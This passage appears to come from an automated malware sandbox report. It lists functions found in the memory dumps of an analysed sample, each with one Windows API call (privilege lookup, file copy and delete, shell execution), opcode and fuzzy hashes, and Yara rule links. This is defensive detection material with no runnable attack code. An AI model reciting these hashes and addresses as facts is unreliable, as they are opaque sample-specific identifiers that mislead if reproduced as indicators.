API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: b3e8a043379a53e7b13f454f68140aaf0ef1e0bdcff777867e12a2eff8924252
Instruction ID: 6d23471ac2b5cf173a6be57285ce076282e528c9f070e36c3222b17a66fef87c
Opcode Fuzzy Hash: b3e8a043379a53e7b13f454f68140aaf0ef1e0bdcff777867e12a2eff8924252
Instruction Fuzzy Hash: CF219D75600704AFEB21CF55DC84FA6F7ECEF04710F4485AAE9498B691D760E948CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 004310C6, Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000E40,BCC3C851,00000000,00000000,00000000,00000000), ref: 00431130

Memory Dump Source

Source File: 00000004.00000002.453921089.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 0ce3c472c5aeaf44567a12618adebd27e643f51d24dd267e12cb4c3e0b319ba7
Instruction ID: c978f13dfc0daf2c39004a948df70fc8e699a1437527219a74ef2d104334289c
Opcode Fuzzy Hash: 0ce3c472c5aeaf44567a12618adebd27e643f51d24dd267e12cb4c3e0b319ba7
Instruction Fuzzy Hash: 1611AF71500304AFFB21CF55DC84FABFBACEF08320F1485AAEA49CA651D674E9458BB5

Uniqueness

Uniqueness Score: -1.00%

Function 00430C04, Relevance: 1.6, APIs: 1, Instructions: 69fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,?), ref: 00430C7A

Memory Dump Source

Source File: 00000004.00000002.453921089.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 4bb5ce49ea7f6af3c9a58dbcc616ee1fc54e08fae513e768955d819ae5cb694d
Instruction ID: a2761b9d3f653473283658c0bc26c2ef497fced35c21eec79e7cc0d5415f73ca
Opcode Fuzzy Hash: 4bb5ce49ea7f6af3c9a58dbcc616ee1fc54e08fae513e768955d819ae5cb694d
Instruction Fuzzy Hash: 0E2192715093809FD7228F25DC95B56FFA8EF06220F0885EBE985CB253D275D844CB61

Uniqueness

Uniqueness Score: -1.00%

Function 004318AF, Relevance: 1.6, APIs: 1, Instructions: 68fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?), ref: 0043191C

Memory Dump Source

Source File: 00000004.00000002.453921089.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 31c6160a3002fb8e42db21163e730f1432425865ee2c40a16a8b5348a8d16336
Instruction ID: 546044ef5601044ad6f5d36b0bb6c26b9a99c531056b03e855d2fd84d5fd94f6
Opcode Fuzzy Hash: 31c6160a3002fb8e42db21163e730f1432425865ee2c40a16a8b5348a8d16336
Instruction Fuzzy Hash: A42193755093C05FD7128B25DC55B56BFB4EF06220F0980DBDD85CF263D269A908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0019B42D, Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

LoadLibraryShim.MSCOREE(?,?,?,?), ref: 0019B4A9

Memory Dump Source

Source File: 00000004.00000002.453693236.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: LibraryLoadShim
String ID:
API String ID: 1475914169-0
Opcode ID: 3876ff514376a9d0343d360c83bbf895059f85383a031103cd0aa5e2334e7d8a
Instruction ID: 0c15100c8f751ba195b7b6b404839c083b364b6c4639db396f258ed43b49fcae
Opcode Fuzzy Hash: 3876ff514376a9d0343d360c83bbf895059f85383a031103cd0aa5e2334e7d8a
Instruction Fuzzy Hash: 642193715093805FDB228F15DC85B62BFE8EF56714F08809AED858B253D375E908D772

Uniqueness

Uniqueness Score: -1.00%

Function 00430866, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

SetNamedSecurityInfoW.ADVAPI32(?,?,?,?,?,?,?), ref: 004308D2

Memory Dump Source

Source File: 00000004.00000002.453921089.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: InfoNamedSecurity
String ID:
API String ID: 1443090519-0
Opcode ID: 92c6698f9b984e43ab0e85ad5628aa46ed64af050bc19dd3b2d83d9e680ecafa
Instruction ID: 93331345e59d4af954c67d1d03d236a1c16fde68113fe137db70681b67c0da86
Opcode Fuzzy Hash: 92c6698f9b984e43ab0e85ad5628aa46ed64af050bc19dd3b2d83d9e680ecafa
Instruction Fuzzy Hash: F8215E716003049FEB20DF69D884B66F7E8EF08710F0885AADD49CB652E334E944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0019B380, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

AddAtomW.KERNEL32(?), ref: 0019B3EC

Memory Dump Source

Source File: 00000004.00000002.453693236.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: Atom
String ID:
API String ID: 2154973765-0
Opcode ID: d40975fdfd76181985d982738b27ae5dfba2e1db864c81700d671c78fdfe9429
Instruction ID: 9a8d36059dcba3e51a37cfecc3d36e9f02f990187625b8f985624cbcf97d29d6
Opcode Fuzzy Hash: d40975fdfd76181985d982738b27ae5dfba2e1db864c81700d671c78fdfe9429
Instruction Fuzzy Hash: 9A215E715093C09FD712CB25DD85B52BFE4EF42220F0984DAD989CF263D275A908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00431A01, Relevance: 1.6, APIs: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 00431A75

Memory Dump Source

Source File: 00000004.00000002.453921089.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 34e39017558324459496027e0075facd8fb9450103365f6e5e6a14ae3ca7dfb3
Instruction ID: 9abbb69431a21f168b37bc77fabcacdf6977f82427726297f254caa2eb97417d
Opcode Fuzzy Hash: 34e39017558324459496027e0075facd8fb9450103365f6e5e6a14ae3ca7dfb3
Instruction Fuzzy Hash: A52190715093C09FDB138F25DC44A52BFB0EF17310F0985DBE9848F563D265A818DB62

Uniqueness

Uniqueness Score: -1.00%

Function 0019A5FB, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0019A666

Memory Dump Source

Source File: 00000004.00000002.453693236.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 21df7030f4c2667634a9faca3fd8c410e36220e764185896077d859c101596fb
Instruction ID: ae290866f2e81b0b99663eea1e78fa390fe0e68efd6269a241d5e35f7d0f368e
Opcode Fuzzy Hash: 21df7030f4c2667634a9faca3fd8c410e36220e764185896077d859c101596fb
Instruction Fuzzy Hash: FD11A271409780AFDB228F54DC44A62FFB4EF46310F0885DAED858B553D276A418DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00430CF5, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,?), ref: 00430D57

Memory Dump Source

Source File: 00000004.00000002.453921089.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: cc209d85b210abc956cfcf5f5fcf66054c0ad27bbe8ccf39a9d1150b9da2e4dc
Instruction ID: 81f6e9909a9fbcb1fef170d5bc2cb2ee8eee83ab2b3459e5a484dd89e6fe7e43
Opcode Fuzzy Hash: cc209d85b210abc956cfcf5f5fcf66054c0ad27bbe8ccf39a9d1150b9da2e4dc
Instruction Fuzzy Hash: DA11B1755053809FDB118B25DC85B56BFE8EF06320F0885AAED49CB253D275E804CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0043180C, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 00431868

Memory Dump Source

Source File: 00000004.00000002.453921089.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: ebdfcc716779e85e5785d4f406093797ce003a3306a652aab9aa8c9db5a41a30
Instruction ID: 4b30a4a1e6643352043a24c54526c671a302c8086ef3cabacaae5cc93289a4f1
Opcode Fuzzy Hash: ebdfcc716779e85e5785d4f406093797ce003a3306a652aab9aa8c9db5a41a30
Instruction Fuzzy Hash: 421182755093809FD712CF25DC94B56BFA8EF46220F0884EBED49CB253D275E908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 004316A2, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E40,BCC3C851,00000000,00000000,00000000,00000000), ref: 00431701

Memory Dump Source

Source File: 00000004.00000002.453921089.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 0fca6414d0362bd5a8f3721dc1f255abca6733a1a7ec368fb1e2269e8cb4fdfc
Instruction ID: a620c60f2cdbd4a8238106a72f4fe5d440b2c89ab2bdcb9c605dd0339b5ced03
Opcode Fuzzy Hash: 0fca6414d0362bd5a8f3721dc1f255abca6733a1a7ec368fb1e2269e8cb4fdfc
Instruction Fuzzy Hash: 7C11C471400300EFFB21CF55DC84F6AFBA8EF44320F1485AAE9498A651C675E5459BB6

Uniqueness

Uniqueness Score: -1.00%

Function 00431C11, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 00431C74

Memory Dump Source

Source File: 00000004.00000002.453921089.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: DestroyWindow
String ID:
API String ID: 3375834691-0
Opcode ID: 94951228b72e52310f88bf4e90bc4f3dd0f19a8b239dde1068eafb4452ca1883
Instruction ID: 5e1e6a5388b2ad04c65242121d2f2d145fcf4a680a65a847bdcfd787b27eedf4
Opcode Fuzzy Hash: 94951228b72e52310f88bf4e90bc4f3dd0f19a8b239dde1068eafb4452ca1883
Instruction Fuzzy Hash: F91104755097C05FD7128B25EC85B52BFB4EF07220F0880DBDD848B263D265A918CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00431D93, Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 00431DFD

Memory Dump Source

Source File: 00000004.00000002.453921089.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 0c25224712f836f3c25812c7f6ac9cdb47caa0a53db410724bc74ef83354fc33
Instruction ID: ec3b329da02ea7531dd8fd98ab0a39a0fe7691298043813824ce1432a02a0f12
Opcode Fuzzy Hash: 0c25224712f836f3c25812c7f6ac9cdb47caa0a53db410724bc74ef83354fc33
Instruction Fuzzy Hash: DB11E271509780AFDB228F15DC85B52FFB4EF06324F0884DEED854B663C276A818CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0019A97B, Relevance: 1.6, APIs: 1, Instructions: 54comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(?), ref: 0019A9DC

Memory Dump Source

Source File: 00000004.00000002.453693236.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 0c441466432786c4d5ffc70447642bb2060daaadc6cbd9f788e28494798fec58
Instruction ID: 56e723b5d3828dd34a72cc17728986affe97b21e54745b73db8a74e91c2842c4
Opcode Fuzzy Hash: 0c441466432786c4d5ffc70447642bb2060daaadc6cbd9f788e28494798fec58
Instruction Fuzzy Hash: 5E1182715493C4AFDB128F15DC45B51BFB4EF46224F0884DAED458F253D275A908CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 004305EA, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00430632

Memory Dump Source

Source File: 00000004.00000002.453921089.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: a95627bdfd3f5de49dd20c700795957aadb0f95da8fd485db94972395f332b2b
Instruction ID: 863270fc7957b1f18e05fab6689d383daf57756bddf98cbd9567049042c80271
Opcode Fuzzy Hash: a95627bdfd3f5de49dd20c700795957aadb0f95da8fd485db94972395f332b2b
Instruction Fuzzy Hash: 0911A1716003009FEB10CF29DC8AB66FBD8EF58720F0885AADD49CB746D675E854CA62

Uniqueness

Uniqueness Score: -1.00%

Function 00430C32, Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,?), ref: 00430C7A

Memory Dump Source

Source File: 00000004.00000002.453921089.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: a95627bdfd3f5de49dd20c700795957aadb0f95da8fd485db94972395f332b2b
Instruction ID: 27b4721f599db8be0fbda7fe43a3c5b4886d6a180c77a532ae4da99c6d191771
Opcode Fuzzy Hash: a95627bdfd3f5de49dd20c700795957aadb0f95da8fd485db94972395f332b2b
Instruction Fuzzy Hash: 6511A1756013008FEB24CF29DC85B66FBD8EB08320F0896AADD49CB742D675E844CA66

Uniqueness

Uniqueness Score: -1.00%

Function 004315E2, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E40,BCC3C851,00000000,00000000,00000000,00000000), ref: 00431635

Memory Dump Source

Source File: 00000004.00000002.453921089.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 4560ed59071cff79d3f22c8fe35a9b395f2a29a668f34a67feec11d88f7e9bc7
Instruction ID: 2abeb07fcd7c8223005279bee9a300e1d1d35a447bfd3fe6b37529d7938e386c
Opcode Fuzzy Hash: 4560ed59071cff79d3f22c8fe35a9b395f2a29a668f34a67feec11d88f7e9bc7
Instruction Fuzzy Hash: 2F01D671500304EFF710CB45DC85FBAFB98EF44720F18819BED098B651C678E9448AB6

Uniqueness

Uniqueness Score: -1.00%

Function 00430D1A, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,?), ref: 00430D57

Memory Dump Source

Source File: 00000004.00000002.453921089.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: f5d4491d4f73953e4dac8a147e2479251c5975fa9bf11cc40e1c4306c13e8ccf
Instruction ID: ae0d1e8d6a735d7be0c1d1aa5a2045eee820b8d88b44938678063fd9c401cc77
Opcode Fuzzy Hash: f5d4491d4f73953e4dac8a147e2479251c5975fa9bf11cc40e1c4306c13e8ccf
Instruction Fuzzy Hash: D601B1756013409FEB10CF69EC8576AFBD4EF08320F0885ABDD09CB742D679E844CAA6

Uniqueness

Uniqueness Score: -1.00%

Function 004318E2, Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?), ref: 0043191C

Memory Dump Source

Source File: 00000004.00000002.453921089.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 1ae862582d3f9743ac5334733ac71cfb3c679578c33bbc1ab200976cf65bee51
Instruction ID: 0ee6ba551737a44c301df73ccc0eb4f9205279e5caea8903b28fc55e72dc894a
Opcode Fuzzy Hash: 1ae862582d3f9743ac5334733ac71cfb3c679578c33bbc1ab200976cf65bee51
Instruction Fuzzy Hash: 0501B5B56013008FEB10CF15D885766FB94EF04320F0884ABDC0DCB752D679E944CA62

Uniqueness

Uniqueness Score: -1.00%

Function 0043182E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 00431868

Memory Dump Source

Source File: 00000004.00000002.453921089.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: 57cd0719f3cda2e878cd13c8962e2248edcc34015e9ac725dd4ad49effeb9baa
Instruction ID: 0943c9fa0cd66f5283a20271be004df66c7b7c3493098e184e7ed614075bc267
Opcode Fuzzy Hash: 57cd0719f3cda2e878cd13c8962e2248edcc34015e9ac725dd4ad49effeb9baa
Instruction Fuzzy Hash: 46019E31A013408FEB14DF29D888766FBD8EF48320F08C4ABDD09CB652D279E944CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0019B45E, Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON

Download Yara Rule

APIs

LoadLibraryShim.MSCOREE(?,?,?,?), ref: 0019B4A9

Memory Dump Source

Source File: 00000004.00000002.453693236.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: LibraryLoadShim
String ID:
API String ID: 1475914169-0
Opcode ID: 814b9b1993e4eb8ec7a6cf4d7d5d66929a6c39a70ff38d806fb6827c6ee95423
Instruction ID: 5c42fe5d39ea2207403b553510f35967f0fb529b387ebecbe5e1b3639cee9358
Opcode Fuzzy Hash: 814b9b1993e4eb8ec7a6cf4d7d5d66929a6c39a70ff38d806fb6827c6ee95423
Instruction Fuzzy Hash: EE019E715043009FEB20CF19ED85B66FBE4EF14720F0880A9ED4A8B642D375E804DB72

Uniqueness

Uniqueness Score: -1.00%

Function 0019A622, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0019A666

Memory Dump Source

Source File: 00000004.00000002.453693236.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 4a6fe35819f849022278f3881a13e229d4c7f40702f4ba056dfa8d2cbd564dd1
Instruction ID: bba217b8e4d44cdfb53f8491e6f8e4653c2718e3c30e14c1ef2fdaaa2b4f29df
Opcode Fuzzy Hash: 4a6fe35819f849022278f3881a13e229d4c7f40702f4ba056dfa8d2cbd564dd1
Instruction Fuzzy Hash: 14016D314017009FEB218F55D984B66FFE0EF48320F0889AADE494A612D376E518DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0019B3B2, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

AddAtomW.KERNEL32(?), ref: 0019B3EC

Memory Dump Source

Source File: 00000004.00000002.453693236.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: Atom
String ID:
API String ID: 2154973765-0
Opcode ID: e05c4ee54b30aba0cdb63fac01c151dbc846bda7515624e7f6d7f43f209ca0b5
Instruction ID: 80f2e54505d01ae82c4616955984cdf0ac3e5faf02f0ee2b0fbe41b8718d1629
Opcode Fuzzy Hash: e05c4ee54b30aba0cdb63fac01c151dbc846bda7515624e7f6d7f43f209ca0b5
Instruction Fuzzy Hash: 1C018F719093409FEB10CF16EAC9766FBD4EB40720F08C4AADD498F642D375E944DAA2

Uniqueness

Uniqueness Score: -1.00%

Function 0019A2F6, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SetConsoleCtrlHandler.KERNEL32(?,00000E40,?,?), ref: 0019A346

Memory Dump Source

Source File: 00000004.00000002.453693236.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: ConsoleCtrlHandler
String ID:
API String ID: 1513847179-0
Opcode ID: abe1d5820f2a5c0c5b3948af75c058c8dd31b1b74d361f6968950b19d1505795
Instruction ID: d219dbd41f8d117f8c605aa1c11ea409d6f6a739479211173e88105d1425ee88
Opcode Fuzzy Hash: abe1d5820f2a5c0c5b3948af75c058c8dd31b1b74d361f6968950b19d1505795
Instruction Fuzzy Hash: 9C018671900701AFD314DF16DC46B26FBA4FB88B20F148259ED085B741D275F555CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 00431DC2, Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 00431DFD

Memory Dump Source

Source File: 00000004.00000002.453921089.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 240c9423b54b566f8619e2ec5e8258935e3caccb2f9d19677fbd9426337d49fd
Instruction ID: 42634a939a96004b1b6ac514e172c9e64d6a18b0d42405c1c7b3aca994f1e176
Opcode Fuzzy Hash: 240c9423b54b566f8619e2ec5e8258935e3caccb2f9d19677fbd9426337d49fd
Instruction Fuzzy Hash: F6018435500704DFEB208F15D885B66FBA0EF18320F08C4AEDD494BA62D276E554DB62

Uniqueness

Uniqueness Score: -1.00%

Function 0019A9AA, Relevance: 1.5, APIs: 1, Instructions: 39comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(?), ref: 0019A9DC

Memory Dump Source

Source File: 00000004.00000002.453693236.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 2482e54e6243035b7c24cdae2fe3fd771d21a2c7d368b5aaa3e48d6ffbae68e1
Instruction ID: c1587bf6bc95e7d9c4bb9a1f9d1f44d07b6a0683fd0244402361179460b3a203
Opcode Fuzzy Hash: 2482e54e6243035b7c24cdae2fe3fd771d21a2c7d368b5aaa3e48d6ffbae68e1
Instruction Fuzzy Hash: 7A01DC308013409FEB20CF15E988769FFA4EF40320F48C4EADD088B602D379E948CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 00431C42, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 00431C74

Memory Dump Source

Source File: 00000004.00000002.453921089.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: DestroyWindow
String ID:
API String ID: 3375834691-0
Opcode ID: d75ca29c870d211be5346c6846dbd349bcc14a439c84bc99e2dff63d3cd1dd88
Instruction ID: c00cfeb2077e1bc91b9fda952e939311c0c8e4b4a71c972cf6ce577c8671710e
Opcode Fuzzy Hash: d75ca29c870d211be5346c6846dbd349bcc14a439c84bc99e2dff63d3cd1dd88
Instruction Fuzzy Hash: 6301F9355407008FE710CF15E889766FB94EF44320F08D0EBDD4D4B752C275E854CA62

Uniqueness

Uniqueness Score: -1.00%

Function 00431A3A, Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 00431A75

Memory Dump Source

Source File: 00000004.00000002.453921089.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 8fc053c65c23f66fdb56d36f27ce8916f04bde3c89c21d503f904a5823e0b3a1
Instruction ID: be6e649f1ed3132090b4b9d73116b8df1a4b1f9b357524d264ae66dc3a834226
Opcode Fuzzy Hash: 8fc053c65c23f66fdb56d36f27ce8916f04bde3c89c21d503f904a5823e0b3a1
Instruction Fuzzy Hash: 8501A231401344DFEB208F45D884B65FFA0EF18321F08C49ADD490B622C276A554DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00349260, Relevance: 1.5, Strings: 1, Instructions: 269COMMON

Download Yara Rule

Strings

, xrefs: 003496FF

Memory Dump Source

Source File: 00000004.00000002.453850641.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 28a4c50d2187c65163c769ad71a37096ea94a8a017f2c4c9caeba4692888d48e
Instruction ID: 76913603495e2328415d6da85d7580323a615e659cd387c2069b58d91dee84c2
Opcode Fuzzy Hash: 28a4c50d2187c65163c769ad71a37096ea94a8a017f2c4c9caeba4692888d48e
Instruction Fuzzy Hash: 15B1E075C05328CFDB25CFA2E8487EEBBF4BB06305F21512AD005AB690C3785A8ADF55

Uniqueness

Uniqueness Score: -1.00%

Function 0034924F, Relevance: 1.5, Strings: 1, Instructions: 263COMMON

Download Yara Rule

Strings

, xrefs: 003496FF

Memory Dump Source

Source File: 00000004.00000002.453850641.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 67bee3aec247ec46a24b03a3c05c349d261e860c2cd1223de51742eee6cb2d42
Instruction ID: e7c1caee4d480af3edb8e13d009ecf5d608191047647b329fd4eafa0fe35b545
Opcode Fuzzy Hash: 67bee3aec247ec46a24b03a3c05c349d261e860c2cd1223de51742eee6cb2d42
Instruction Fuzzy Hash: EBB10274C05318CFDB21CFA1D8887EEBBF0BB0A305F21556AD005AB690C3786A8ADF50

Uniqueness

Uniqueness Score: -1.00%

Function 00349550, Relevance: 1.5, Strings: 1, Instructions: 207COMMON

Download Yara Rule

Strings

, xrefs: 003496FF

Memory Dump Source

Source File: 00000004.00000002.453850641.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 3b469c53ca708a8421580bc500496322fdc7cc46dac8d83cff60801eb95cad9b
Instruction ID: a897f5245ea8164ce4223bd3f468fb9c80394c440e366e88474a3089cbef9c5a
Opcode Fuzzy Hash: 3b469c53ca708a8421580bc500496322fdc7cc46dac8d83cff60801eb95cad9b
Instruction Fuzzy Hash: 9C81E475C05328CFDB25CFA1E8487AEBBF4BB06305F11552AD006AB690C3785A8ADF14

Uniqueness

Uniqueness Score: -1.00%

Function 00349337, Relevance: 1.5, Strings: 1, Instructions: 207COMMON

Download Yara Rule

Strings

, xrefs: 003496FF

Memory Dump Source

Source File: 00000004.00000002.453850641.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 16d192c43b7d7f565c3b81aee0f28e1dc1b64f415a476c5ea11fbda338ec1769
Instruction ID: cd1b08f2635ae89b2f8abc2d5411f02b9442e1d0211786e1b21f1cd6737a5b3c
Opcode Fuzzy Hash: 16d192c43b7d7f565c3b81aee0f28e1dc1b64f415a476c5ea11fbda338ec1769
Instruction Fuzzy Hash: 1B81E375C04328CFDB25CFA1E8487AEBBF0BB06305F11516AD019BB691C7786A8ADF54

Uniqueness

Uniqueness Score: -1.00%

Function 0034963F, Relevance: 1.5, Strings: 1, Instructions: 205COMMON

Download Yara Rule

Strings

, xrefs: 003496FF

Memory Dump Source

Source File: 00000004.00000002.453850641.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: a2fcbd9cb82a3875eb653718166d520adbe8445ffb70a3411c0381c2d2b1b688
Instruction ID: 3a3b0315ffd639d9a642bbfb8b1907a593a1dc391f629abe9cab59a623c6ebb5
Opcode Fuzzy Hash: a2fcbd9cb82a3875eb653718166d520adbe8445ffb70a3411c0381c2d2b1b688
Instruction Fuzzy Hash: DA711875C04328CFDB21CFA1D8487EEBBF0BB06305F11552AD016AB690C3786A8ADF14

Uniqueness

Uniqueness Score: -1.00%

Function 003494D6, Relevance: 1.5, Strings: 1, Instructions: 202COMMON

Download Yara Rule

Strings

, xrefs: 003496FF

Memory Dump Source

Source File: 00000004.00000002.453850641.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 2d2c8426ac460b4d62dcd7c3fa94b21123a3546fe893e2445c660302d24c1123
Instruction ID: f78090b2eded485236f1ac7e582e42f505099a9bfc178d6c864386a506d9d427
Opcode Fuzzy Hash: 2d2c8426ac460b4d62dcd7c3fa94b21123a3546fe893e2445c660302d24c1123
Instruction Fuzzy Hash: A671F775C14318CFDB25CFA1E8487AEBBF0BB06306F11552AD005BB690C3785A8ADF14

Uniqueness

Uniqueness Score: -1.00%

Function 00349675, Relevance: 1.4, Strings: 1, Instructions: 198COMMON

Download Yara Rule

Strings

, xrefs: 003496FF

Memory Dump Source

Source File: 00000004.00000002.453850641.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 1680d80b52e6cfbaad3476f5bbfdf6e3155ad0711d8bce4d4498e880226e3aa9
Instruction ID: 43dcb27c0e14ec8073f3ea9aa8cfd41efed5de0c1773ba696783d0ddb5a5c076
Opcode Fuzzy Hash: 1680d80b52e6cfbaad3476f5bbfdf6e3155ad0711d8bce4d4498e880226e3aa9
Instruction Fuzzy Hash: 8A712774C05328CFDB22CFA1E8487AEBBF0BB06305F11556AD005BB691C378698ADF15

Uniqueness

Uniqueness Score: -1.00%

Function 00349477, Relevance: 1.4, Strings: 1, Instructions: 195COMMON

Download Yara Rule

Strings

, xrefs: 003496FF

Memory Dump Source

Source File: 00000004.00000002.453850641.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false

Similarity

API ID:
String ID:
API String ID: 0-3916222277
